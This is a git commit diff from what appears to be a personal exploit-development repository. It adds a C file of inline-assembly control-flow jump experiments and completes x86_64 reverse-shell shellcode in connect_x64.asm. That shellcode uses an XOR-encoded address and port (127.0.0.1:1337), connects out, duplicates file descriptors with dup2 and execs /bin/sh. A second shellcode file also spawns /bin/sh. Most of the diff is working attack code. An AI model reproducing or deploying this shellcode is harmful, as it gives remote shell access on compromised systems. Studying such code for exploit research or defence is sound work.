diff options
| author | toni <matzeton@googlemail.com> | 2015-09-23 12:39:54 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2015-09-23 12:39:54 +0200 |
| commit | ba60e5853f3c655245229c7abf1a8e25922a127a (patch) | |
| tree | 57f715f1157a796f40743693131b9055245f93e8 | |
| parent | f187f832b297045d85635ddbb1285ba0b83fb403 (diff) | |
x86_64 shellcode + funcjmp_ext
| -rw-r--r-- | .gitignore | 1 | ||||
| -rw-r--r-- | funcjmp_ext.c | 45 | ||||
| -rw-r--r-- | shellcode/connect_x64.asm | 50 | ||||
| -rw-r--r-- | shellcode/socket_x64.asm | 2 |
4 files changed, 75 insertions, 23 deletions
@@ -7,3 +7,4 @@ overflow_tcp_x64 sc-test sc-test_x64 funcjmp_simple +funcjmp_ext diff --git a/funcjmp_ext.c b/funcjmp_ext.c new file mode 100644 index 0000000..70f757a --- /dev/null +++ b/funcjmp_ext.c @@ -0,0 +1,45 @@ +#include <stdio.h> +#include <stdlib.h> + + +#define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \ + asm volatile(_asm_str); \ + asm volatile(".att_syntax prefix"); +#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void) +#define JMP_FUNC_DECL(func) void *fptr = (void *)( &func ); +#define JMP_TO_FUNC \ + INTEL_ASM(" \ + call getip; \ + jmp short donext; \ + cfunc: \ + mov eax,[fptr]; \ + add eax,0x0; \ + jmp eax; \ + ret; \ + getip: \ + nop; \ + jmp short cfunc; \ + donext: \ + "); + +#define PRE_JUMP(arg) + + +int hookable(char *arg0, int arg1, int arg2) +{ + asm("label:"); + INTEL_ASM("nop; nop; nop"); + asm("jmp end"); + return 0; +} + +int main(int argc, char **argv) +{ + asm("push %0" : : "m" (hookable)); + asm("push %0" : : "g" (hookable)); + asm("jmp label; \ + end:"); + //hookable(NULL, 0x8, 0x9); + return 66; +} + diff --git a/shellcode/connect_x64.asm b/shellcode/connect_x64.asm index d1e0ef2..829a7fd 100644 --- a/shellcode/connect_x64.asm +++ b/shellcode/connect_x64.asm @@ -17,32 +17,38 @@ mov rdi,rax xor rax,rax push rax push rax -push 0x1011116E ; XOR-encoded -> 127.0.0.1 -xor dword [rsp],0x11111111 -push word 0x2814 ; push tcp port (XOR-encoded -> 1337) -xor word [rsp],0x1111 ; decode tcp port -push word 0x2 ; 0x2 -> AF_INET -mov rsi,rsp +push dword 0x1011116E ; XOR-encoded -> 127.0.0.1 +xor dword [rsp],0x11111111 +push word 0x2814 ; push tcp port (XOR-encoded -> 1337) +xor word [rsp],0x1111 ; decode tcp port +push word 0x2 ; 0x2 -> AF_INET +mov rsi,rsp mov dl,0x10 mov al,42 syscall ; dup2() -;mov rbx,rdi -;xor rdi,rdi -;xor rsi,rsi -;xor rcx,rcx ; zero out count register -;mov cl,0x3 ; loopcount -;dupes: -;xor eax,eax ; zero out eax -;mov al,33 ; dup2() syscall -;dec cl -;mov rdi,rcx -;mov rsi,rbx -;syscall -;inc cl -;loop dupes +xor rdx,rdx +mov dl,0x3 +dupes: +mov rsi,rdx +dec rsi +xor rax,rax +mov al,0x21 +syscall +dec dl +jnz dupes -; exec() +; exec +mov rax,0x68732f6e69622f2f ; string 'hs/nib//' +push rax +xor rax,rax +mov byte [rsp + 8],al +mov rdi,rsp +push rax +mov rsi,rsp +push rax +mov rdx,rsp +mov al,0x3b +syscall -; exit() diff --git a/shellcode/socket_x64.asm b/shellcode/socket_x64.asm index 1ec36b0..885c0fd 100644 --- a/shellcode/socket_x64.asm +++ b/shellcode/socket_x64.asm @@ -57,7 +57,7 @@ jnz dupes mov rax,0x68732f6e69622f2f ; string 'hs/nib//' push rax ; push the string onto the stack xor rax,rax -mov byte [rsp + 8],al ; null-terminate the string +mov byte [rsp + 8],al ; null-terminate the string mov rdi,rsp ; arg1 = pointer to string push rax ; arg2 = null mov rsi,rsp |